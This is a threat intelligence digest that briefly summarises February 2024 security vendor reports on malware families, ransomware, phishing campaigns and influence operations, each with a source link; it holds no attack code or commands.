- The article “The Rising Threat of Pikabot” by eSentire discusses the increasing danger of the Pikabot malware and the capabilities of eSentire’s 24/7 Security Operations Centers (SOCs) in responding to threats. The article also highlights the TRU team’s discovery of other dangerous threats, such as the Kaseya MSP breach and the more_eggs malware. The article provides a detailed analysis of the Pikabot malware, including its initial infection through a phishing email and its use of obfuscation techniques. It also explains how Pikabot is injected into the SearchProtocolHost.exe process and its functionality to gather host information and check for specific language settings. The article also discusses additional insights, such as unsuccessful infection attempts and recommendations from the TRU team for the prevention and detection of Pikabot.
Source:
https://www.esentire.com/blog/the-rising-threat-of-pikabot
—
- Intel Source:
- Crowdstrike
- Intel Name:
- LATAM_Malware_Variants
- Date of Scan:
- 2024-02-23
- Impact:
- LOW
- Summary:
- The article provides an overview of updates and changes made to various malware families targeting users in Latin America (LATAM) in 2023. These include Mispadu, Kiron, Caiman, Culebra, Salve, and Astaroth, which primarily target users in Brazil, Spain, Italy, and Australia. The updates include the use of CAPTCHAs, new components in the infection chain, and new obfuscation methods. The article also discusses the potential overlap between Mispadu and Astaroth, as well as a new threat called Doit. It then delves into the technical details of these malware variants, including encryption and decryption methods, deployment chains, and C2 protocols. The article also provides recommendations to avoid or detect eCrime commodity malware infections and lists indicators of compromise. It concludes by discussing a new Brazilian-based adversary, SAMBA SPIDER, and providing details on specific malware families and their tactics, techniques, and procedures. The article also includes a case study of updates made to the Caiman downloader in September 2023.
Source:
https://www.crowdstrike.com/blog/latin-america-malware-update/
—
- Intel Source:
- Sentinel Labs
- Intel Name:
- Russian_Aligned_Influence_Operation_Affecting_German_Audiences
- Date of Scan:
- 2024-02-23
- Impact:
- LOW
- Summary:
- Researchers at SentinelLabs have closely monitored the activities of an alleged Russia-aligned influence operation network named Doppelgänger. Their observations reveal that Doppelgänger has been specifically targeting German audiences, a trend aligned with recent reports from the German Ministry of Foreign Affairs and Der Spiegel.
Source:
https://www.sentinelone.com/labs/doppelganger-russia-aligned-influence-operation-targets-germany/
—
- Intel Source:
- Esentire
- Intel Name:
- The_DarkVNC_Technical_Analysis
- Date of Scan:
- 2024-02-23
- Impact:
- LOW
- Summary:
- DarkVNC is a hidden utility based on VNC technology, used for stealthy remote access. It was advertised in 2016 and received updates until 2017. DarkVNC has been used by threat actors associated with IcedID and SolarMarker campaigns. This analysis focuses on a DarkVNC sample that uses ‘vncdll64.dll’ for exporting functions. It generates a unique ID to send to the C2 server along with system info. DarkVNC can search for and manipulate windows related to the desktop environment. It can also control the state of devices like keyboard and mouse, and block user input. The malware gathers details on the Chrome browser install and runs cmd prompts. Detection and prevention controls like EDR solutions and training programs are recommended.
Source:
https://www.esentire.com/blog/technical-analysis-of-darkvnc
—
- Intel Source:
- Sucuri
- Intel Name:
- Angel_Crypto_Drainer
- Date of Scan:
- 2024-02-23
- Impact:
- LOW
- Summary:
- The article discusses the growing threat of Web3 crypto malware, specifically the Angel Drainer, which targets individuals interested in cryptocurrencies and NFTs. The authors provide an overview of the current list of top level domains maintained by IANA and mention a placeholder domain used by the malware. They also discuss the use of the “Ipsum” domain in phishing sites and the high number of scans recorded by URLScan.io. The article provides statistics on the number of unique domain names and titles associated with the malware, as well as the top three second level domains used. It also discusses the steps website owners can take to protect their sites from these types of attacks. The authors then delve into the specifics of the Angel Drainer malware, including its use of crypto drainers to steal and redistribute assets from compromised wallets. They also mention the surge in malicious activity linked to recent security breaches and the use of phishing tactics to trick users into giving up their cryptocurrency assets. The article also discusses the benefits of using a web application firewall and offers services to remove malware infections and secure websites. The authors provide an analysis of the threat of malicious injections in the Web3 ecosystem and describe a specific malware injection targeting WordPress sites. They also discuss the various waves of attacks carried out by the Angel Drainer malware and provide information on the top 50 most common titles for phishing pages used by the drainer. The article also mentions the use of an ACCESS_KEY by the drainer and its connection to the Rilide Stealer. It also provides information on phishing subdomains on the website Vercel.app and the number of phishing web.app subdomains found in relation to Firebase Hosting. The authors also discuss a new type of malware that targets Web3 crypto users and provides details on the different versions of the malware. They also mention the investigation into a malware that impersonates the BillionAir Web3 gambling platform and provide information on suspicious requests made by the drainer. The article concludes by mentioning the 530 phishing pages found on subdomains of the website pages.dev, which is hosted on Cloudflare Pages.
Source:
https://blog.sucuri.net/2024/02/web3-crypto-malware-angel-drainer.html
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Anti_Sandbox_Techniques
- Date of Scan:
- 2024-02-23
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have examined a malware sample and discovered that several methods rely on simple checks that are easily performed in a simple Windows script (.bat) file. Additionally, they came over an intriguing one that downloads the subsequent payload after doing a simple check.
Source:
https://isc.sans.edu/diary/Simple+AntiSandbox+Technique+Wheres+The+Mouse/30684/
—
- Intel Source:
- Cofense
- Intel Name:
- New_MaaS_InfoStealer_Malware_Campaign
- Date of Scan:
- 2024-02-23
- Impact:
- LOW
- Summary:
- Cofense researchers discussed in their post a new phishing campaign targeting the oil and gas industry, which uses a recently updated Malware-as-a-Service called Rhadamanthys Stealer. The campaign starts with a phishing email and leads to a clickable PDF file that downloads the malware. The Rhadamanthys Stealer is written in C++ and has various features to steal information. The article also mentions that the malware recently received a major update, making it more customizable for threat actors. A table of indicators of compromise is provided, and the article concludes by stating that more details will be provided in the future.
Source:
https://cofense.com/blog/new-maas-infostealer-malware-campaign-targeting-oil-gas-sector/
—
- Intel Source:
- Trustwave
- Intel Name:
- A_discovery_of_the_phishing_as_a_service_Tycoon_Group
- Date of Scan:
- 2024-02-22
- Impact:
- LOW
- Summary:
- A phishing-as-a-service called Tycoon Group was discovered recently. It uses sophisticated techniques like WebSocket for data exfiltration and Cloudflare for evading detection. Available since August 2023, it enables easy deployment of phishing pages mimicking Microsoft and Google login. It provides an admin panel to manage campaigns and view stolen credentials.
—
- Intel Source:
- Medium
- Intel Name:
- Konni_RAT_Malware_Backdoored_into_Russian_Government_Software
- Date of Scan:
- 2024-02-22
- Impact:
- LOW
- Summary:
- A backdoor has been included in an installer for a utility that is probably used by the Ministry of Foreign Affairs (MID)’s Russian Consular Department to distribute the remote access trojan Konni RAT (also known as UpDog). As per DCSO experts, the Konni RAT package detected in software installers is a tactic that the gang used back in October 2023, when it was discovered that the trojan was being distributed using a Russian tax filing software called Spravki BK that had a backdoor. The utility named ‘Statistika KZU’ (Cтатистика ОЗY) appears to be the target of this backdoored installer.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Malware_Compromises_Personal_Data_Through_Vibrator_Infection
- Date of Scan:
- 2024-02-22
- Impact:
- LOW
- Summary:
- The article explores an incident involving the infection of a vibrator, specifically the Spencer’s Sexology Pussy Power 8-Function Rechargeable Bullet Vibrator, with an information stealer named Lumma. Lumma operates on a Malware-as-a-Service (MaaS) model, where cybercriminals acquire access to malicious software and its infrastructure by paying other cybercriminals. Lumma’s primary function is to steal information from cryptocurrency wallets, browser extensions, and two-factor authentication details. While Lumma is commonly distributed through email campaigns, this case highlights its potential spread through infected USB drives as well.
Source:
https://www.malwarebytes.com/blog/news/2024/02/vibrator-virus-steals-your-personal-information
—
- Intel Source:
- Aqua Sec
- Intel Name:
- DDoS_Botnet_Lucifer_Targeting_Apache_Big_Data_Stack
- Date of Scan:
- 2024-02-22
- Impact:
- MEDIUM
- Summary:
- Researchers from AquaSec have revealed a new effort that aims to take down the Apache Hadoop and Apache Druid big-data stacks. After more research, it was found that the attacker uses known vulnerabilities and misconfigurations in the Apache cloud honeypots to carry out the attacks.
Source:
https://www.aquasec.com/blog/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack/
—
- Intel Source:
- Huntress
- Intel Name:
- Decrypted_HomuWitch_Ransomware
- Date of Scan:
- 2024-02-21
- Impact:
- LOW
- Summary:
- During the investigation of the threat, it was discovered the vulnerability, which allowed Hintress analysts to create a free decryption tool for all the HomuWitch victims. HomuWitch is a ransomware strain that initially emerged in July 2023. HomuWitch contains a vulnerability present during the encryption process that allows the victims to retrieve all their files without paying the ransom.
Source:
https://malware.news/t/decrypted-homuwitch-ransomware/78949
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Malicious_Campaigns_Exploiting_Google_Cloud_Run_in_LATAM
- Date of Scan:
- 2024-02-21
- Impact:
- MEDIUM
- Summary:
- Researchers from Cisco Talos have noticed that a number of banking trojans, including Astaroth (also known as Guildma), Mekotio, and Ousaban, are presently being distributed to targets throughout Europe and Latin America through the misuse of Google Cloud Run in high-volume malware distribution campaigns. Since September 2023, the amount of emails related to these initiatives has grown dramatically, and they are still always keeping an eye out for fresh email distribution programs. Malicious Microsoft Installers (MSIs), which serve as droppers or downloaders for the final malware payloads, are a feature of the infection chains linked to various malware families.
Source:
https://blog.talosintelligence.com/google-cloud-run-abuse/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Information_Campaign_Regarding_War_That_Targets_Speakers_of_Ukrainian
- Date of Scan:
- 2024-02-21
- Impact:
- LOW
- Summary:
- Operation Texonto is a disinformation/PSYOP campaign that primarily distributes its message via spam emails. Remarkably, it doesn’t appear that the offenders disseminated their statements via popular platforms like Telegram or phony websites. In November 2023 and at the end of December 2023, respectively, they identified two distinct waves. The emails’ topics, which are common in Russian propaganda, included food shortages, medicine shortages, and heating outages.
—
- Intel Source:
- Lab52 blog
- Intel Name:
- The_deployment_of_the_Kazuar_malware
- Date of Scan:
- 2024-02-21
- Impact:
- LOW
- Summary:
- This article focuses on a new sample used by the Turla APT group in their attacks, which uses a wrapper called Pelmeni and deploys the Kazuar malware. The article compares this sample with a previous one and confirms the use of a substitution algorithm similar to Kazuar. It also discusses the use of a new protocol for exfiltration and a different log’s folder. The article provides indicators of compromise and hashes for the samples used. The section titled “Pelmeni Wrapper” provides a detailed analysis of the wrapper, its structure, and functions. The article also discusses the Turla group’s history and their use of the Sideload DLL technique. The following section delves into the analysis of the.NET binary extracted from the wrapper.
Source:
https://lab52.io/blog/pelmeni-wrapper-new-wrapper-of-kazuar-turla-backdoor/
—
- Intel Source:
- Cado Security Labs
- Intel Name:
- Migo_Malware_Targeting_Redis_for_Cryptocurrency_Mining
- Date of Scan:
- 2024-02-21
- Impact:
- LOW
- Summary:
- Researchers from Cado Security Labs have encountered a new malware campaign that focuses on exploiting Redis for initial access. Although Redis has been a common target for Linux and cloud-centric attackers, this specific campaign employs unique system weakening techniques against the data store. The malware, known as Migo, is designed by its developers to compromise Redis servers with the goal of cryptocurrency mining on the underlying Linux host.
Source:
https://www.cadosecurity.com/migo-a-redis-miner-with-novel-system-weakening-techniques/
—
- Intel Source:
- Reversing Labs
- Intel Name:
- Malicious_Actors_Exploiting_Open_Source_Code_in_Software_Supply_Chains
- Date of Scan:
- 2024-02-21
- Impact:
- LOW
- Summary:
- The article explores the growing trend of cybercriminals utilizing open-source code and package managers for malicious activities. Instead of relying on traditional methods like spearphishing, attackers are now planting malware in open-source repositories. The emergence of DLL sideloading attacks, typically associated with compromised environments, is now evident in open-source incidents. The identification of malicious PyPI packages underscores a broader pattern of cyber threats leveraging DLL sideloading to compromise software supply chains. This highlights the importance of increased security monitoring and integrity checks for both software producers and organizations.
Source:
https://www.reversinglabs.com/blog/attackers-leverage-pypi-to-sideload-malicious-dlls
—
- Intel Source:
- Cyble
- Intel Name:
- Advanced_version_of_ObserverStealer_AsukaStealer_malware
- Date of Scan:
- 2024-02-20
- Impact:
- MEDIUM
- Summary:
- The article discusses a new type of information-stealing malware called AsukaStealer, which is being offered as a service on Russian cybercrime forums. It is a revamped version of the ObserverStealer and uses tactics, techniques, and procedures (TTPs) identified by the MITRE ATT&CK framework, including credential access, discovery, and collection, as well as remote system discovery and data collection. The article also provides a list of indicators of compromise (IoCs) associated with AsukaStealer, such as IP addresses and file hashes.
—
- Intel Source:
- bleepingcomputer
- Intel Name:
- Hackers_Exploit_Critical_RCE_Flaw_In_Bricks_Builder_Theme
- Date of Scan:
- 2024-02-20
- Impact:
- LOW
- Summary:
- The article highlights the active exploitation of a significant vulnerability in the widely-used Brick Builder Theme for WordPress, boasting approximately 25,000 installations. This flaw permits RCE and the possible execution of harmful PHP code. The security concern arises from an eval function call within the ‘prepare_query_vars_from_settings’ function, providing an avenue for unauthorized users to exploit it. The Patchstack platform promptly reported the vulnerability to the Bricks team, resulting in the release of a fix in version 1.9.6.1 on February 13. Despite the absence of evidence of exploitation, users are strongly advised to upgrade to ensure heightened security.
—
- Intel Source:
- Google Blog
- Intel Name:
- Iranian_and_Hezbollah_Hackers_Attack_to_Influence_Israel_Hamas_Narrative
- Date of Scan:
- 2024-02-20
- Impact:
- MEDIUM
- Summary:
- Cybercriminals supported by Hezbollah and Iran orchestrated cyberattacks with the intention of eroding public support for the Israel-Hamas conflict following October 2023. This includes devasting attacks on important Israeli institutions, hack-and-leak schemes aimed at American and Israeli organizations, phishing scams intended to obtain intelligence, and disinformation tactics to sway public opinion against Israel. In the six months preceding the attacks on October 7, Iran was responsible for almost eighty percent of all government-sponsored phishing attempts directed towards Israel.
Source:
https://blog.google/technology/safety-security/tool-of-first-resort-israel-hamas-war-in-cyber/
—
- Intel Source:
- Trendmicro
- Intel Name:
- Earth_Preta_Campaign_Targets_Asian_Countries_with_DOPLUGS
- Date of Scan:
- 2024-02-20
- Impact:
- MEDIUM
- Summary:
- Researchers from TrendMicro have noted that the customized PlugX malware is not the same as the standard PlugX malware, which is merely used to download the latter and does not contain a finished backdoor command module. They chose to rename this piece of modified PlugX malware as DOPLUGS because of its unique features. Investigating further, they discovered that the KillSomeOne module was being used by the DOPLUGS malware.
Source:
https://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html
—
- Intel Source:
- CyberGeeks
- Intel Name:
- The_technical_analysis_of_the_Backmydata_ransomware
- Date of Scan:
- 2024-02-20
- Impact:
- LOW
- Summary:
- The article provides a technical analysis of the BackMyData ransomware, which was used to attack hospitals in Romania. The Abstract section gives an overview of the ransomware’s actions, including encryption of files using AES256 and dropping ransom notes. The Technical Analysis section delves into the ransomware’s code and methods, such as disabling the firewall and deleting Volume Shadow Copies. It also explains how the ransomware establishes persistence and encrypts files with specific extensions. The article also provides indicators of compromise and references for further information on the ransomware.
—
- Intel Source:
- BfV & NIS
- Intel Name:
- Hackers_from_North_Korea_Linked_to_Defense_Sector_Supply_Chain_Attack
- Date of Scan:
- 2024-02-20
- Impact:
- MEDIUM
- Summary:
- Both the National Intelligence Service (NIS) of South Korea and the Federal Intelligence Agency (BfV) of Germany have issued an advisory alert regarding an ongoing cyber-espionage campaign on behalf of the North Korean government that targets the global defense sector. The strikes are intended to steal information on cutting-edge military technology and assist North Korea in modernizing its conventional weapons and creating new military capabilities.
—
- Intel Source:
- Sucuri
- Intel Name:
- RemoteRATRemoval_types_and_mitigation
- Date of Scan:
- 2024-02-20
- Impact:
- LOW
- Summary:
- The article titled “Remote Access Trojan (RAT): Types, Mitigation & Removal” provides a comprehensive overview of RATs, a type of malware that allows attackers to gain remote access and control over infected systems. The article discusses the various types of RATs, their infiltration techniques, command-and-control communication, and stealth mechanisms. It also highlights the dangers of RAT attacks, including data theft, botnets, and ransomware deployment. The article emphasizes the importance of website security in preventing the spread of RATs and provides tips for removing RATs and protecting against them. It also discusses the role of RATs in website security and provides examples of how websites can spread RAT infections. The article concludes by recommending website security best practices and the use of a web application firewall to protect against RATs.
Source:
https://blog.sucuri.net/2024/02/remote-access-trojan-rat-types-mitigation-removal.html
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Dynamic_Sandbox_Detection_in_Python_InfoStealer
- Date of Scan:
- 2024-02-20
- Impact:
- LOW
- Summary:
- Python-based infostealers are not new. Additionally, they incorporate several sandbox detection methods to evade execution (and likely detection) through automated analysis. Researchers from ISC.SANS discovered one last week that takes a similar but distinct method. Typically, the scripts include a list of “bad stuff” to look for, such as users, processes, MAC addresses, etc.
Source:
https://isc.sans.edu/diary/Python+InfoStealer+With+Dynamic+Sandbox+Detection/30668/
—
- Intel Source:
- S2W Blog
- Intel Name:
- Cybercriminals_Using_RustDoor_and_GateDoor_as_Fake_Software
- Date of Scan:
- 2024-02-19
- Impact:
- LOW
- Summary:
- The Rust-based macOS malware known as RustDoor was identified and actively monitored by S2W’s threat intelligence center in December 2023. They discovered the Windows version of RustDoor after additional investigation, and since it was created in Golang rather than Rust, they called it GateDoor. It has been verified that RustDoor and GateDoor are both issued as regular software updates or programs.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Attackers_Using_Mirai_Botnet_on_Open_Internet
- Date of Scan:
- 2024-02-19
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have examined how hackers are utilizing the Mirai Botnet malware to target openly accessible Internet of Things devices and take advantage of security holes.
Source:
https://isc.sans.edu/diary/MiraiMirai+On+The+Wall+Guest+Diary/30658
—
- Intel Source:
- Trellix
- Intel Name:
- Deep_Dive_into_MrAgent_and_Ransomware_Negotiations
- Date of Scan:
- 2024-02-19
- Impact:
- MEDIUM
- Summary:
- Ransomware-as-a-Service group known for its MrAgent tool, which automates ransomware deployment. Highlighting the group’s focus on double extortion schemes, the analysis covers their targeting strategy, negotiation tactics with victims, and the technical workings of MrAgent. Additionally, it examines the financial trail of ransom payments, offering insights into the group’s operational and financial tactics
Source:
https://www.trellix.com/blogs/research/ransomhouse-am-see/
—
- Intel Source:
- Recorded Future
- Intel Name:
- TAG_70_Hackers_Targeting_European_Government_and_Military_Mail_Servers
- Date of Scan:
- 2024-02-19
- Impact:
- LOW
- Summary:
- Recorded Future researchers have spotted TAG-70 using cross-site scripting (XSS) vulnerabilities against European Roundcube webmail servers, specifically targeting organizations associated to national infrastructure, the military, and government. Activity reported by other security vendors with the identities Winter Vivern, TA473, and UAC-0114 overlaps with TAG-70. The organization has been active since at least December 2020 and mainly targets governments in Europe and Central Asia. It probably runs cyber-espionage operations to further the objectives of Belarus and Russia.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2024-0217.pdf
—
- Intel Source:
- CyberMasterV
- Intel Name:
- An_Analysis_of_BackMyData_Ransomware_That_Attacked_Romanian_Hospitals
- Date of Scan:
- 2024-02-19
- Impact:
- LOW
- Summary:
- Researchers report that a ransomware attack that began on February 11 resulted in 100 hospitals in Romania to shut down their computer systems. The BackMyData ransomware, which claimed responsibility for it, is a member of the Phobos family. The malware included an AES key that is used to decrypt its configuration, which includes information on whitelisted files, directories, and extensions in addition to a public RSA key that is used to encrypt AES keys used to encrypt data.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Agniane_information_stealer_malware
- Date of Scan:
- 2024-02-16
- Impact:
- LOW
- Summary:
- The Agniane Stealer is an information-stealing malware that attacks the cryptocurrency wallets of its victims. It was observed recently a campaign of these attacks and Cisco Talos analysts identified and detailed analysis of a previously unrecognized network URL pattern. Plus uncovered more information on the malware’s methods for file collection and the intricacies of its command and control (C2) protocol.
Source:
https://blogs.cisco.com/security/agniane-stealer-information-stealer-targeting-cryptocurrency-users
—
- Intel Source:
- Rapid7
- Intel Name:
- Unauthorized_access_to_two_publicly_facing_Confluence_servers
- Date of Scan:
- 2024-02-16
- Impact:
- MEDIUM
- Summary:
- Rapid7 Incident Response investigated an incident involving unauthorized access to two publicly-facing Confluence servers that were the source of multiple malware executions. Rapid7 identified evidence of exploitation for CVE-2023-22527 within available Confluence logs. During the investigation, Rapid7 identified cryptomining software and a Sliver Command and Control (C2) payload on in-scope servers.
Source:
https://www.rapid7.com/blog/post/2024/02/15/rce-to-sliver-ir-tales-from-the-field/
—
- Intel Source:
- CERT-AGID
- Intel Name:
- TA544_Exploiting_Danabot_Malware_Again
- Date of Scan:
- 2024-02-16
- Impact:
- LOW
- Summary:
- Three months have passed since the last wave in November 2023, and there is still a significant effort targeting Italian users that uses the “Revenue Agency” concept to disseminate malware. This new threat seeks to install the Danabot malware on victims’ devices in order to obtain unauthorized access to sensitive data. It has been identified as the work of the criminal group TA544, which is skilled in targeted attacks using spear phishing and social engineering and is notorious for spreading the Gozi Ursnif malware.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_spread_of_utility_scam_campaign_thru_online_ads
- Date of Scan:
- 2024-02-16
- Impact:
- LOW
- Summary:
- Malwarebytes blog shared a point of the problem of how it works and how criminals pretend to be the utility company so they can threaten and extort as much money from you as they can. And how analysts observed and collected many ads and fake sites of fraudulent utility scam ads.
—
- Intel Source:
- Symantec
- Intel Name:
- Comparative_Analysis_of_Alpha_and_NetWalker_Ransomware_Versions
- Date of Scan:
- 2024-02-16
- Impact:
- LOW
- Summary:
- Analyzing Alpha reveals that it is a lot like the previous version of the NetWalker ransomware. The payload is delivered by a similar PowerShell-based loader in both threats. Furthermore, there is a substantial amount of code overlap between the payloads for Alpha and NetWalker.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/alpha-netwalker-ransomware
—
- Intel Source:
- SentinelLabs
- Intel Name:
- A_Novel_AWS_SNS_based_Smishing_Attack_Tool
- Date of Scan:
- 2024-02-16
- Impact:
- LOW
- Summary:
- SentinelLabs discovered SNS Sender, a pioneering tool exploiting AWS’s Simple Notification Service (SNS) for smishing (SMS phishing) campaigns. Authored by ARDUINO_DAS, a figure already known in the phishing scene, this tool signifies a shift in how threat actors leverage cloud services for malicious activities. SNS Sender uniquely uses AWS SNS for bulk SMS spamming to distribute phishing links, often under the guise of USPS notifications about missed package deliveries.
—
- Intel Source:
- Sentilone
- Intel Name:
- Kryptina_RaaS
- Date of Scan:
- 2024-02-15
- Impact:
- LOW
- Summary:
- Sentilone analysts detailed out in ther blogthe development, technicalities and implications of Kryptina RaaS and its move into open-source crimeware.
Source:
https://www.sentinelone.com/blog/kryptina-raas-from-underground-commodity-to-open-source-threat/
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Advanced_Cybercriminals_rapidly_diversify_cyberattack_channels
- Date of Scan:
- 2024-02-15
- Impact:
- MEDIUM
- Summary:
- EclecticIQ analysts looked at recent Ivanti vulnerabilities and the infrastructure connected to the recent activities. The analysts described new, previously unreported infrastructure that may be linked to similar exploit attempts. EclecticIQ analysts looked at recent Ivanti vulnerabilities and the infrastructure tied to the earliest reporting.
—
- Intel Source:
- Zerofox
- Intel Name:
- New_Tax_Fraud_Scheme
- Date of Scan:
- 2024-02-15
- Impact:
- LOW
- Summary:
- This month the Russian threat actor “Journalist” shared a method of leveraging the legitimate gocardless[.]com service to discover corporate employee identification numbers (EINs) to perform tax fraud schemes against U.S. citizens, on the Russian-speaking community “Coockie Pro.”
—
- Intel Source:
- Huntress
- Intel Name:
- Data_Leakage_via_Finger
- Date of Scan:
- 2024-02-15
- Impact:
- LOW
- Summary:
- Researchers at Huntress have examined a Windows Defender detection from the past, or what they call a “Managed Antivirus” (MAV) warning, looking for the finger.exe command line that sent a series of digits to the IP address linked to the November activity.
Source:
https://www.huntress.com/blog/threat-intel-accelerates-detection-and-response
—
- Intel Source:
- Fortinet
- Intel Name:
- TicTacToe_Dropper_Analysis
- Date of Scan:
- 2024-02-15
- Impact:
- MEDIUM
- Summary:
- While analyzing new malware samples collected from several victims, the FortiGuard researchers identified a grouping of malware droppers used to deliver various final-stage payloads throughout 2023.
Source:
https://www.fortinet.com/blog/threat-research/tictactoe-dropper
—
- Intel Source:
- Cisco Talos
- Intel Name:
- TinyTurla_Next_Generation
- Date of Scan:
- 2024-02-15
- Impact:
- LOW
- Summary:
- Cisco Talos has observed a new backdoor managed by the Turla APT group, a Russian cyber espionage threat group. This new backdoor called “TinyTurla-NG” (TTNG) is similar to Turla’s another backddor, TinyTurla, in coding style and functionality implementation.
Source:
https://blog.talosintelligence.com/tinyturla-next-generation/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Phishing_Attacks_Using_Remote_Monitoring_and_Management_Software
- Date of Scan:
- 2024-02-14
- Impact:
- LOW
- Summary:
- Researchers at Malwarebytes have investigated a specific phishing scheme using the AnyDesk remote software to target business users. IT administrators may streamline activities and ensure network integrity remotely with the use of popular products like AnyDesk, Atera, and Splashtop, which are examples of remote monitoring and management (RMM) software. Cybercriminals, however, have noticed these same tools and are using them to breach corporate networks and steal confidential information.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Malware_development_competition
- Date of Scan:
- 2024-02-14
- Impact:
- LOW
- Summary:
- The CYFIRMA research team has observed a sharp rise in malware being distributed on a Russian hacking forum at no cost. The forum administrators had announced a malware development competition on 1st November 2023.
Source:
https://www.cyfirma.com/outofband/malware-development-competition-fuels-creation-of-20-malware/
—
- Intel Source:
- ReliaQuest
- Intel Name:
- Emergence_of_Novel_SocGholish_Infection_Chain
- Date of Scan:
- 2024-02-14
- Impact:
- LOW
- Summary:
- Researchers from ReliaQuest have found suspicious JavaScript files in client environments, such as “update.js,” which is a file name frequently used by malware versions pretending to be updates, such as SocGholish. Upon examining the first-stage payload’s execution, they discovered a novel characteristic of this malware, the intrusion of Python for persistence.
Source:
https://www.reliaquest.com/blog/new-python-socgholish-infection-chain/
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_sophisticated_GoBased_JKwerlo_ransomware_variant
- Date of Scan:
- 2024-02-14
- Impact:
- LOW
- Summary:
- Cyble researchers analyzed a new sophisticated Go-Based JKwerlo ransomware variant that attacked French And Spanish-speaking users.
Source:
https://cyble.com/blog/new-go-based-jkwerlo-ransomware-poses-a-risk-to-french-and-spanish-users/
—
- Intel Source:
- trendmicro
- Intel Name:
- Water_Hydra_Exploits_Zero_Day_Vulnerabilities
- Date of Scan:
- 2024-02-14
- Impact:
- LOW
- Summary:
- In its attacks aimed at financial market traders, the APT organization Water Hydra has been taking advantage of the Microsoft Defender SmartScreen vulnerability (CVE-2024-21412). The Trend Micro Zero Day Initiative found and made public this vulnerability, which Microsoft has now fixed.
—
- Intel Source:
- Violexity
- Intel Name:
- CharmingCypress_malware_family
- Date of Scan:
- 2024-02-14
- Impact:
- LOW
- Summary:
- The Violexity’s post was published to share the observation of CharmingCypress malware family activity from 2023 to early 2024 including details on techniques the threat actor has used to distribute them.
Source:
https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/
—
- Intel Source:
- Cyfirma
- Intel Name:
- Malware_spread_via_YouTube_Videos
- Date of Scan:
- 2024-02-14
- Impact:
- LOW
- Summary:
- Cybereason has observed threat actors exploiting older YouTube accounts to host links to malware (including infostealers like Redline and Racoonstealer and other commodity malware like SmokeLoader) that masquerade as cracked versions of popular paid software.
Source:
https://www.cyfirma.com/outofband/malware-development-competition-fuels-creation-of-20-malware/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- The_Mirai_Bot_Exploits_Bytevalue_Router_Vulnerability
- Date of Scan:
- 2024-02-13
- Impact:
- LOW
- Summary:
- Researchers at INC.SANS have examined a URL that surfaced in their “First Seen” list. At first, the sensors picked up requests for “goform/webRead/open” alone. “Goform”-containing URLs are usually connected to the RealTek SDK. The SDK is typically used by routers built around RealTek SoCs (Systems on a Chip) to implement web-based access features. There were formerly a lot of vulnerabilities in the RealTek SDK. Currently, they use a “/goform/” URL to track more than 900 distinct URLs within the honeypots.
—
- Intel Source:
- HHS GOV
- Intel Name:
- In_depth_examination_of_Akira_ransomware
- Date of Scan:
- 2024-02-13
- Impact:
- LOW
- Summary:
- In its brief existence, the Akira ransomware group has shown to be a formidable and proficient adversary to the American healthcare industry. Akira makes use of a lot of shared elements in its operations and targeting. They function as ransomware-as-a-service (RaaS), meaning they concentrate on ransomware operations while collaborating with other cybercriminals to launch targeted assaults and split the extorted money.
Source:
https://www.hhs.gov/sites/default/files/akira-randsomware-analyst-note-feb2024.pdf
—
- Intel Source:
- Proofpoint
- Intel Name:
- Cyberattack_Targeting_Executives_Using_Microsoft_Azure
- Date of Scan:
- 2024-02-13
- Impact:
- MEDIUM
- Summary:
- Proofpoint researchers have identified an active cloud account takeover campaign targeting Microsoft Azure environments. The attack, combining credential phishing and cloud account takeover tactics, has impacted various organizations globally. Threat actors utilize individualized phishing lures within shared documents, directing users to malicious webpages. Diverse roles, including senior executives, are targeted, with a specific Linux user-agent identified. Post-compromise activities involve MFA manipulation, data exfiltration, internal and external phishing, financial fraud attempts, and mailbox rule creation. The attackers’ operational infrastructure includes proxies, data hosting services, and hijacked domains, posing challenges for defenders. While no specific attribution is provided, Russian and Nigerian attackers are noted as potential actors. The Proofpoint team recommends enhanced security measures, including user training, multi-factor authentication, and continuous monitoring.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Glupteba_botnet_using_undocumented_UEFI_Bootkit_to_Avoid_Detection
- Date of Scan:
- 2024-02-13
- Impact:
- LOW
- Summary:
- It has been discovered that the Glupteba botnet using a previously unreported Unified Extensible Firmware Interface (UEFI) bootkit functionality, which gives the malware an extra degree of stealth and sophistication. By interfering with and controlling the [operating system] boot process, this bootkit allows Glupteba to conceal itself and develop a covert persistence that can be very challenging to find and eliminate.
Source:
https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/#post-132484-_ydqdbjg0dngh
—
- Intel Source:
- ASEC
- Intel Name:
- RAT_Distribution_Leveraging_Legitimate_Tools_for_Stealth
- Date of Scan:
- 2024-02-13
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have uncovered a complex cyberattack scheme employing legitimate software tools alongside malicious files to distribute Revenge RAT malware stealthily. Attackers cleverly execute a malicious setup.exe file under the guise of running legitimate tools such as smtp-validator and Email To Sms, making detection by users challenging. The malware establishes persistence by hiding its components and manipulating Windows registry for autorun, further downloading additional payloads from a C2 server disguised as a benign blog. This multi-stage attack involves evasion techniques, such as using the CMSTP method for bypassing antivirus detection and employing fileless execution of Revenge RAT, to perform various malicious activities including data theft.
—
- Intel Source:
- Zscaler
- Intel Name:
- PikaBot_Appears_Again_with_Simplified_Code_and_Clever_Strategies
- Date of Scan:
- 2024-02-13
- Impact:
- LOW
- Summary:
